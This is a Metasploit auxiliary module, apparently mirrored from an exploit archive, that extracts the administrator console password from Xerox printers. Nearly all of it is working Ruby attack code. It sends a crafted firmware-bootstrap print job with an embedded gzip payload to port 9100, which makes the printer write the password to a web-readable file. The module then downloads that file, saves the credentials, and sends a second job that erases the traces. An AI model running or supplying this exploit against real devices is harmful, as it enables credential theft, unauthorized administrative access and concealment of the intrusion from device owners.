Share
## https://sploitus.com/exploit?id=PACKETSTORM:180618
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Report  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Xerox Administrator Console Password Extractor',  
'Description' => %q{  
This module will extract the management console's admin password from the  
Xerox file system using firmware bootstrap injection.  
},  
'Author' =>  
[  
'Deral "Percentx" Heiland',  
'Pete "Bokojan" Arzamendi'  
],  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
OptPort.new('RPORT', [true, 'Web management console port for the printer', 80]),  
OptPort.new('JPORT', [true, 'Jetdirect port', 9100]),  
OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45])  
])  
end  
  
def jport  
datastore['JPORT']  
end  
  
# Time to start the fun  
def run  
print_status("#{rhost}:#{jport} - Attempting to extract the web consoles admin password...")  
return unless write  
  
print_status("#{rhost}:#{jport} - Waiting #{datastore['TIMEOUT']} seconds...")  
sleep(datastore['TIMEOUT'])  
passwd = retrieve  
remove  
  
if passwd  
print_good("#{rhost}:#{jport} - Password found: #{passwd}")  
  
loot_name = 'xerox.password'  
loot_type = 'text/plain'  
loot_filename = 'xerox_password.text'  
loot_desc = 'Xerox password harvester'  
p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc)  
print_good("#{rhost}:#{jport} - Credentials saved in: #{p}")  
  
register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd)  
  
else  
print_error("#{rhost}:#{jport} - No credentials extracted")  
end  
end  
  
# Trigger firmware bootstrap write out password data to URL root  
def write  
print_status("#{rhost}:#{jport} - Sending print job")  
create_print_job = '%%XRXbegin' + "\x0a"  
create_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0a"  
create_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0a"  
create_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0a"  
create_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0a"  
create_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0a"  
create_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0a"  
create_print_job << '%%OID_ATT_DLM_SIGNATURE "8ba01980993f55f5836bcc6775e9da90bc064e608bf878eab4d2f45dc2efca09"' + "\x0a"  
create_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0a"  
create_print_job << '%%XRXend' + "\x0a\x1f\x8b"  
create_print_job << "\x08\x00\x80\xc3\xf6\x51\x00\x03\xed\xcf\x3b\x6e\xc3\x30\x0c\x06"  
create_print_job << "\x60\xcf\x39\x05\xe3\xce\x31\x25\xa7\x8e\xa7\x06\xe8\x0d\x72\x05"  
create_print_job << "\x45\x92\x1f\x43\x2d\x43\x94\x1b\x07\xc8\xe1\xab\x16\x28\xd0\xa9"  
create_print_job << "\x9d\x82\x22\xc0\xff\x0d\x24\x41\x72\x20\x57\x1f\xc3\x5a\xc9\x50"  
create_print_job << "\xdc\x91\xca\xda\xb6\xf9\xcc\xba\x6d\xd4\xcf\xfc\xa5\x56\xaa\xd0"  
create_print_job << "\x75\x6e\x35\xcf\xba\xd9\xe7\xbe\xd6\x07\xb5\x2f\x48\xdd\xf3\xa8"  
create_print_job << "\x6f\x8b\x24\x13\x89\x8a\xd9\x47\xbb\xfe\xb2\xf7\xd7\xfc\x41\x3d"  
create_print_job << "\x6d\xf9\x3c\x4e\x7c\x36\x32\x6c\xac\x49\xc4\xef\x26\x72\x98\x13"  
create_print_job << "\x4f\x96\x6d\x98\xba\xb1\x67\xf1\x76\x89\x63\xba\x56\xb6\xeb\xe9"  
create_print_job << "\xd6\x47\x3f\x53\x29\x57\x79\x75\x6f\xe3\x74\x32\x22\x97\x10\x1d"  
create_print_job << "\xbd\x94\x74\xb3\x4b\xa2\x9d\x2b\x73\xb9\xeb\x6a\x3a\x1e\x89\x17"  
create_print_job << "\x89\x2c\x83\x89\x9e\x87\x94\x66\x97\xa3\x0b\x56\xf8\x14\x8d\x77"  
create_print_job << "\xa6\x4a\x6b\xda\xfc\xf7\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
create_print_job << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xea\x03\x34\x66\x0b\xc1"  
create_print_job << "\x00\x28\x00\x00"  
  
begin  
connect(true, 'RPORT' => jport)  
sock.put(create_print_job)  
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout  
print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")  
ensure  
disconnect  
end  
end  
  
def retrieve  
print_status("#{rhost}:#{jport} - Retrieving password from #{rhost}")  
request = "GET /Praeda.txt HTTP/1.0\r\n\r\n"  
  
begin  
connect  
sock.put(request)  
res = sock.get_once || ''  
passwd = res.match(/\r\n\s(.+?)\n/)  
return passwd ? passwd[1] : ''  
rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError  
print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")  
return  
ensure  
disconnect  
end  
end  
  
# Trigger firmware bootstrap to delete the trace files and praeda.txt file from URL  
def remove  
print_status("#{rhost}:#{jport} - Removing print job")  
remove_print_job = '%%XRXbegin' + "\x0A"  
remove_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"  
remove_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"  
remove_print_job << '%%OID_ATT_JOB_COMMENT ""' + "\x0A"  
remove_print_job << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"  
remove_print_job << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"  
remove_print_job << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"  
remove_print_job << '%%OID_ATT_DLM_SIGNATURE "8b5d8c631ec21068211840697e332fbf719e6113bbcd8733c2fe9653b3d15491"' + "\x0A"  
remove_print_job << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"  
remove_print_job << '%%XRXend' + "\x0a\x1f\x8b"  
remove_print_job << "\x08\x00\x5d\xc5\xf6\x51\x00\x03\xed\xd2\xcd\x0a\xc2\x30\x0c\xc0"  
remove_print_job << "\xf1\x9e\x7d\x8a\x89\x77\xd3\x6e\xd6\xbd\x86\xaf\x50\xb7\xc1\x04"  
remove_print_job << "\xf7\x41\xdb\x41\x1f\xdf\x6d\x22\x78\xd2\x93\x88\xf8\xff\x41\x92"  
remove_print_job << "\x43\x72\x48\x20\xa9\xf1\x43\xda\x87\x56\x7d\x90\x9e\x95\xa5\x5d"  
remove_print_job << "\xaa\x29\xad\x7e\xae\x2b\x93\x1b\x35\x47\x69\xed\x21\x2f\x0a\xa3"  
remove_print_job << "\xb4\x31\x47\x6d\x55\xa6\x3f\xb9\xd4\xc3\x14\xa2\xf3\x59\xa6\xc6"  
remove_print_job << "\xc6\x57\xe9\xc5\xdc\xbb\xfe\x8f\xda\x6d\xe5\x7c\xe9\xe5\xec\x42"  
remove_print_job << "\xbb\xf1\x5d\x26\x53\xf0\x12\x5a\xe7\x1b\x69\x63\x1c\xeb\x39\xd7"  
remove_print_job << "\x43\x15\xe4\xe4\x5d\x53\xbb\x7d\x4c\x71\x9d\x1a\xc6\x28\x7d\x25"  
remove_print_job << "\xf5\xb5\x0b\x92\x96\x0f\xba\xe7\xf9\x8f\x36\xdf\x3e\x08\x00\x00"  
remove_print_job << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xc4\x0d\x40\x0a"  
remove_print_job << "\x75\xe1\x00\x28\x00\x00"  
  
begin  
connect(true, 'RPORT' => jport)  
sock.put(remove_print_job)  
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout  
print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")  
ensure  
disconnect  
end  
end  
  
def register_creds(service_name, remote_host, remote_port, username, password)  
credential_data = {  
origin_type: :service,  
module_fullname: self.fullname,  
workspace_id: myworkspace_id,  
private_data: password,  
private_type: :password,  
username: username  
}  
  
service_data = {  
address: remote_host,  
port: remote_port,  
service_name: service_name,  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data.merge!(service_data)  
credential_core = create_credential(credential_data)  
  
login_data = {  
core: credential_core,  
status: Metasploit::Model::Login::Status::UNTRIED,  
workspace_id: myworkspace_id  
}  
  
login_data.merge!(service_data)  
create_credential_login(login_data)  
end  
end